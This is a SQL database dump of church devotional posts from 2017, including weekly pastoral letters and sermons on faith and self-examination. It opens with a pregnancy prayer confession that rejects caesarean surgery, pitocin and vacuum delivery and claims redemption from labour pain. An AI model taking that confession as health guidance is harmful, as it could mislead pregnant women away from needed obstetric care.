my reins: thou hast covered me in my mother’s womb.” 14. “I will praise thee; for I am fearfully and wonderfully made: marvelous are thy works; and that my soul knoweth right well.” 15. “My substance was not hid from thee, when I was made in secret, and curiously wrought in the lowest parts of the earth.”  16. “Thine eyes did see my substance, yet being unperfect; and in thy book all my members were written, which in continuance were fashioned, when as yet there was none of them.” 17. “How precious also are thy thoughts unto me, O God! How great is the sum of them! “ 18.“If I should count them, they are more in number than the sand: when I awake, I am still with thee.”  19.“Surely thou wilt slay the wicked, O God: depart from me therefore, ye bloody men.” This is my baby’s experience, formed by God in my womb, fearfully and wonderfully made.</p>\r\n<p>Gen. 35:17-”And it came to pass, when she was in hard labor, that the midwife said unto her, Fear not; thou shall have this son also.” I receive God’s hands upon the midwives, doctors and everyone that will attend to me before, during and after delivery. They will do what is right in my case in Jesus name.</p>\r\n<p>Gen. 3:16- “Unto the woman he said, I will greatly multiply thy sorrow and thy conception; in sorrow thou shalt bring forth children; and thy desire shall be to thy husband, and he shall rule over thee.”</p>\r\n<p>Gal. 3:13 – “Christ hath redeemed us from the curse of the law, being made a curse for us: for it is written, cursed is every one that hangeth on a tree:” Christ has redeemed me from the curse of the law. I am redeemed from the sorrow of pregnancy and childbirth. I reject early morning sickness, reject body back pains, I reject oedema, I reject fainting and being pale. I reject labor pain. I am redeemed from labor pain in Christ Jesus!</p>\r\n<p>Isaiah 66:7 – “before she travailed, she brought forth; before her pain came, she was delivered of a man child. I have short labour period. The lord cut short for me in Jesus name.”</p>\r\n<p>Isaiah 66:8 – “who hath heard such a thing? Who hath seen such things? Shall the earth be made to bring forth in one day? Or shall a nation be born at once? For as soon as Zion travailed, she brought forth her children.” I reject every delay at delivery. As I travail, I bring forth in Jesus name.</p>\r\n<p>Isaiah 66:9 – “shall I bring to the birth, and not cause to bring forth? Saith the lord: shall I cause to bring forth, and shut the womb? Saith thy God. “ I come to the birth and I bring forth. I have full dilation, my womb opens very well. No delay in Jesus name.</p>\r\n<p>Isaiah 66:11- “that ye may suck, and be satisfied with the breasts of her consolations, that ye may milk out, and be delighted with the abundance of her glory. “ My baby sucks well, satisfied with my breast milk in Jesus.</p>\r\n<p>Gal. 1:15- “but when it pleased God, who separated me from my mother’s womb, and called me by his grace” I declare that it is God that separates my baby from my womb – self-normal-delivery in Jesus. Not the knife of surgeons! Not forceful ejection with pitosin, not the vacuum pump. It is the lord and he’ll do a neat job in Jesus name.”</p>\r\n<p>Ex. 23:26- “there shall nothing cast their young, nor be barren, in thy land: the number of thy days I will fulfill. Luke 1:57; Lk. 2:6.” I will not cast my young before the time. No premature delivery, I carry the baby up to term in Jesus name. The days are accomplished.</p>\r\n<p>Psalm 1:3- “and he shall be like a tree planted by the rivers of water, that bringeth forth his fruit in his season; his leaf also shall not wither; and whatsoever he doeth shall prosper. “ I prosper in my pregnancy and delivery and thereafter I do well.</p>\r\n<p>Phil. 4:3- “I can do all things through Christ which strengtheneth me.” I can do all things through Christ that strengthens me. I am strengthened both in the inner and outer man.</p>\r\n<p>Luke 1:44 – “for, lo, as soon as the voice of thy salutation sounded in mine ears, babe leaped in my womb for joy.” My baby is physically active and also filled with the Holy Spirit from the womb.</p>\r\n<p>Psalm 113:9 – “he maketh the barren woman to keep house, and to be a joyful mother of children. Praise ye the lord.” I am joyful mother of children. I am alive and well, my baby (and other children I have) are alive and well. </p>\r\n<p> </p>\r\n<p> </p>\r\n<p>CONCLUSION: </p>\r\n<p> Joshua 1:8 “This book of the law shall not depart out of thy mouth; but thou shalt meditate therein day and night, that thou mayest observe to do according to all that is written therein: for then thou shalt make thy way prosperous, and then thou shalt have good success.”</p>\r\n<p> Proverb 4:20-22. 20 my son, attend to my words; incline thine ear unto my saying. 21 let them not depart from thine eyes; keep them in the midst of thine heart. 22 for they are life unto those that find them, and health to all their flesh.</p>\r\n<p> REMAIN BLESSED IN JESUS.  </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-03-23 16:38:57', 200, '', 0, '0000-00-00 00:00:00', '2017-04-02 08:50:51', 196, '2017-03-23 16:38:57', '0000-00-00 00:00:00', 0, 1, 3, 0, 0, '', '', '', '', 15101, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(37, 'From our Father\'s Heart (26/03/2017)', 'from-our-father-s-heart-26-03-2017', 5, 1, '<p><strong>IDENTIFY AND ELIMINATE TIME WASTERS! </strong></p>\r\n<p>Joshua 13:1 says - \"Now Joshua was old, advanced in years. And the Lord said to him: \"You are old, advanced in years, and there remains very much land yet to be possessed\"</p>\r\n', '\r\n<p>For Joshua, there was regret of aging because he still had a lot of grounds to cover. You are not getting younger either. No matter the beauty/youthful enhancement strategies, you are getting older! If you have not accomplished what you should have within a stipulated period, then you’ve wasted time. Some things can’t just be done at old age.</p>\r\n<p>As you grow in years, you need to eliminate time wasters from your daily schedule so you can be focused to pursue God’s course for your life and not get distracted.   </p>\r\n<p>Here are some of such time wasters, get rid of them as fast as possible:</p>\r\n<ol>\r\n<li>Wrong people – These are people God didn’t plant in your life. Some are brought by the devil, some by men, some came without invitation and some you added by yourself. Wrong people will waste the substance of your destiny.</li>\r\n<li>Offences and unforgiveness – If you hold people down, you’re also held down.</li>\r\n<li>Sins – Using your time to commit evil acts works ruins.</li>\r\n<li>Rebellion – Miriam wasted her time and the whole nation recovering from leprosy in Number 16.</li>\r\n<li>Wrong relationships.</li>\r\n<li>Pleasure, especially when it is undue or overdone.</li>\r\n<li>Compromise.</li>\r\n<li>Regret – Don’t mourn over the past, it is gone! Reach out for the future and how to use it to correct yesterday’s flaws.</li>\r\n<li>Fear.</li>\r\n<li>Unbelief.</li>\r\n<li>Incomplete or lack of training that produces avoidable mistakes.  </li>\r\n</ol>\r\n<p>God has a deep respect for timing and as a child of God you must train yourself to do the same. There is a calendar of God for your life which you must understand and live by. This is because at God’s prophetic time for your lives, God shows up to initiate new things. However, the devil also targets this time to introduce mess into our lives.</p>\r\n<p>David was a man anointed of God and God Himself described him as a man after His own heart (Act. 13:22). However, the devil successfully got him into a mess of murder, adultery and cover up (2 Sam. 11). The first step that led David into a mess was his disrespect for divine timing, although David came out of this mess, it was not without scars (2 Sam. 12:10-14).</p>\r\n<p>Great men have great authority but when they don’t do things at the right time, a mess will be inevitable. Wisdom is actually 80% Time + 20% Decision. If you will be a wise man on the earth you must be a man with an understanding of divine timing for your life (Ecc. 8:5–8). The city of Jerusalem is still in mess today because she missed her time of visitation (Luke. 19:41–44). Not recognising divine timing could eventually lead to generational problems as you can see in the life of David the King.</p>\r\n<p>Conquer laziness and procrastination everyday and it shall be well with you in Jesus’ name. Amen.</p>\r\n<p>Till next week, go and win with Jesus</p>\r\n<p>God\'s Servant,</p>\r\n<p><strong>Rev Olusola Areogun</strong></p>', NULL, NULL, '[]', '', '2017-04-02 08:41:05', 196, '', 0, '0000-00-00 00:00:00', '2017-04-02 11:24:54', 196, '2017-04-02 08:41:05', '0000-00-00 00:00:00', 0, 1, 12, 0, 0, '', '', '', '', 2017, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(38, 'Recognizing the Divine Scale', 'recognizing-the-divine-scale', 2, 1, '<p>Texts: 1 Samuel 2:3, Proverbs 16:2, Isaiah 26:7</p>\r\n<p>1 Samuel 2:3</p>\r\n<p>Talk no more so exceeding proudly; let not arrogancy come out of your mouth: for the LORD is a God of knowledge, and by him actions are weighed.</p>\r\n', '\r\n<p>Proverbs 16:2</p>\r\n<p>All the ways of a man are clean in his own eyes; but the LORD weigheth the spirits.</p>\r\n<p>Isaiah 26:7</p>\r\n<p>The way of the just is uprightness: thou, most upright, dost weigh the path of the just.</p>\r\n<p>Introduction</p>\r\n<p>It is important for every believer to know that God weighs actions, thoughts and intentions of man. Walking conscious of this would make you put yourself regularly on the divine scale. This will help you to know where you stand and correct anything that may be displeasing to the Lord. If you judge yourself, God does not judge you (1Cor.11:31). Lean to examine yourself 2Cor13:5.</p>\r\n<p>Why should you this?</p>\r\n<p>To stand perfect before God- Ps.139:23-24</p>\r\n<p>To be a good witness before God and man. Acts 24:16</p>\r\n<p>For God and man to have a good testimony about you. 1Sam.16:7, Luke 6:26, Prov.16:7.</p>\r\n<p>For you to know whether you are on the path of life or the path of damnation. Prov.14:12, Matt.19:16-21.</p>\r\n<p>For you to know your eternal destination after death. 2Cor.5:10, Amos 5:12-15</p>\r\n<p>Here are measures that God uses for [us] Christians to know how we do before Him.</p>\r\n<p>1. He tests every man (Dan.3:16-18, John 13:15, 1Cor.10:12-13), James 1:2-4, God does not trust the untested.</p>\r\n<p>2. He tests your patience. (Isaiah 40:20-31, Ps.30:56, Ps.40:20-31). Patience is the ability to handle the passage of time without misbehaving.</p>\r\n<p>3. He tests your attitude to money and the world. (Josh 7:1, 19-20, Acts 8:18-20, Gen.31:1-6.)</p>\r\n<p>4. He tests your obedience (1Sam.15-21-22, Num.20:10-12.)</p>\r\n<p>5. He tests your response to evil counsels (Job 2:8-10, 1King 21:4-9.)</p>\r\n<p>6. He tests your truthfulness and sincerity. (Acts 5:1-11, 2Kings 5:15-19)</p>\r\n<p>Learn to weigh yourself on the scale of God’s will expressed in His word and by His Spirit and you shall not be found wanting in Jesus’ name. Amen.</p>', NULL, NULL, '[]', '', '2017-04-02 08:51:00', 196, '', 0, '0000-00-00 00:00:00', '2017-04-02 11:31:31', 196, '2017-04-02 08:51:00', '0000-00-00 00:00:00', 0, 1, 16, 0, 0, '', '', '', '', 2455, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(39, 'From our Father\'s Heart (02/04/2017)', 'from-our-father-s-heart-02-04-2017', 5, 1, '<p>Dearly Beloved, </p>\r\n<p>DEVELOP FAITH FOR SUPERNATURAL LIVING!!! </p>\r\n<p>Everyone on the earth knows how they get their needs met and the will of God for His children is that we receive our needs from Him because He is the only unfailing source (Phi. 4:19; Eph. 3:19). I want you to know that all the provisions of God for your life can only be received by faith, where you operate beyond the realm of the familiar. </p>\r\n', '\r\n<p>Supernatural Living is engaging the assistance of heaven in your earthly activities. Some Christians are suffering today not because God has not provided for their needs but because they are not exploring the means God has made available to get their needs met. It is wisdom for you to enlist all the forces at your disposal to get/obtain your desired result, and I want you to learn the steps involved in obtaining your desired result from God:</p>\r\n<p>(1) Get the promise (the seed) from God’s Word or your prophecy (enhanced seed) from the Lord through the Holy Spirit;</p>\r\n<p>(2) Walk the process required; and</p>\r\n<p>(3) Receive the product. </p>\r\n<p>You need to follow these steps in the right order as highlighted above. The failure of many a Christian is due to the violation of the order. </p>\r\n<p><strong>Note the following points:</strong></p>\r\n<ul>\r\n<li>You can’t get from God through a promise (prophecy) what can only come through a process.</li>\r\n<li>The promise/prophecy is the product in seed form, but you can’t win with promise/prophecy alone, you have to start the process in order to obtain the product (2 Tim. 1:18).</li>\r\n<li>When you come across a promise/prophecy, the first three statements you make will determine whether conception happens or not, and without conception you should not expect any result.</li>\r\n<li>When working the process, stay put because all God’s promises/prophecies are yea and amen (2 Cor. 1:20), and “...because it will surely come, it will not tarry (Hab. 2:3).” </li>\r\n</ul>\r\n<p>Till next week, go and win with Jesus </p>\r\n<p>God\'s Servant</p>\r\n<p>Rev. Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-04-02 11:25:49', 196, '', 0, '0000-00-00 00:00:00', '2017-04-09 13:48:58', 196, '2017-04-02 11:25:49', '0000-00-00 00:00:00', 0, 1, 13, 0, 0, '', '', '', '', 2281, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(40, 'Examples of Weights and Balances', 'examples-of-weights-and-balances', 2, 1, '<p>Texts: 2 Cor. 13:5, Prov.6:2, Is 1:15-17, Rom.6:12, 1Sam 6:7</p>\r\n<p><strong>Introduction</strong></p>\r\n<p>Always put it in mind that the terms weight, scales and balances mean justice, right conscience, correct standard, being straight, qualities that make a man acceptable etc.</p>\r\n<p>Let’s see few examples of people that put themselves on the scale and measured up according to God’s standards.</p>\r\n', '\r\n<p>- Samuel- 1Sam.12:3-5</p>\r\n<p>Samuel could confidently talk of his integrity before the nation of Israel, and they all testified that he was a true man of integrity.</p>\r\n<p>- Jesus- Matt.16:13-16</p>\r\n<p>By what they saw His life, it was not difficult to conclude that He was Christ. His life before them opened them up to the right flow before God.</p>\r\n<p>- Paul 1Cor.9:1-27</p>\r\n<p>He could talk of his life and ministry, everything done in a blameless manner, carefully, labouring with no compromise whatsoever.</p>\r\n<p>- Rechabites- Jer.35:1-12</p>\r\n<p>They became God’s example of a people that will be obedient to their father’s instruction no matter the pressure from anywhere.</p>\r\n<p>When God weighs a man, he either passes or gets promoted, or he is found wanting, i.e. weighs less than expected and he is set side, not fit for the master’s use.</p>\r\n<p>The people we have looked at lived their lives, weighing themselves already by the Lord’s standard so they could measure up.</p>\r\n<p>They didn’t live to violate their conscience, nor choose the pleasure of the world above the kingdom of God’s value system. If you judge yourself, you’ll not be judged. 1Cor.11:30</p>\r\n<p><strong>Examine yourself</strong></p>\r\n<p>If you bring God’s word and the voice of the Holy Spirit to be the standard with which you measure your life, you’ll never be found wanting. But if you move with worldly fashion and style, the flesh demands and human examples some of which are satanically inspired or fleshly governed according to Eph.2:1-2, then you’ll be found wanting when you stand before God, now in time or in eternity.</p>\r\n<p>Make God’s word your scale, your standard and your rule and it shall be well with you in Jesus’ name</p>', NULL, NULL, '[]', '', '2017-04-02 11:31:40', 196, '', 0, '0000-00-00 00:00:00', '2017-04-17 17:27:28', 196, '2017-04-02 11:31:40', '0000-00-00 00:00:00', 0, 1, 17, 0, 0, '', '', '', '', 2643, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(41, 'From our Father\'s Heart (21/05/2017)', 'from-our-father-s-heart-02-04-2017', 5, 1, '<p>Dearly Beloved of God,</p>\r\n<p>Be Confident in God\'s Promise!</p>\r\n<p>Don\'t let your trust in the Lord die no matter what happens. Even in the face of negative situations and circumstances which seem unfavourable, never let your confidence in God\'s word and ability die. God is always ever able to do what He said He would do. Even when you are hard pressed and are going through tough times, let your heart stay in God and let your confidence in Him never wave.</p>\r\n', '\r\n<p>Abraham stood with his confidence unwavering in God that God was able to give him a son. Even when God demanded Isaac to be slaughtered, Abraham confidently went to the mountain, believing that God was able to raise the dead and he had another encounter with God.</p>\r\n<p>The Father has spoken a lot to us over the years and those words reflect the release of heaven over us. Get all these words and put them over yourself every day. Confess them, recite them, declare them, pray all those prayer points again as we journey on with God and you will see everything become reality in your life. This will determine how the future will be for you. </p>\r\n<p>The future is loaded for us already, but it is your responsibility to activate those words over yourself and your family. You should daily confess those covenants and promises over your life. Let all your words align with the covenants that God has made with us. The devil will try to make you cancel all those words but you must align your mouth with your prophecies. That is your key to the life God has prepared for you in life. </p>\r\n<p>Beloved, when day is about to break, that\'s when the night is darkest. When it looks like you can\'t take it anymore, just remember what God has said to you personally through His Word and to us as a church, then put your confidence in that word. God is committed to bringing what He said to pass.</p>\r\n<p>Don\'t put your confidence in flesh, in men or in things. Don\'t even put your confidence in yourself. Just let your confidence stay and grow in God\'s immutability and the immutability of His word; be patient and let Him work.</p>\r\n<p>Hebrews 10:35</p>\r\n<p>35 Therefore do not cast away your confidence, which has great reward.</p>\r\n<p>Till next week, go and win with Jesus</p>', NULL, NULL, '[]', '', '2017-04-09 13:49:02', 199, '', 0, '0000-00-00 00:00:00', '2017-05-21 18:49:46', 196, '2017-04-09 13:49:02', '0000-00-00 00:00:00', 0, 1, 14, 0, 0, '', '', '', '', 1883, 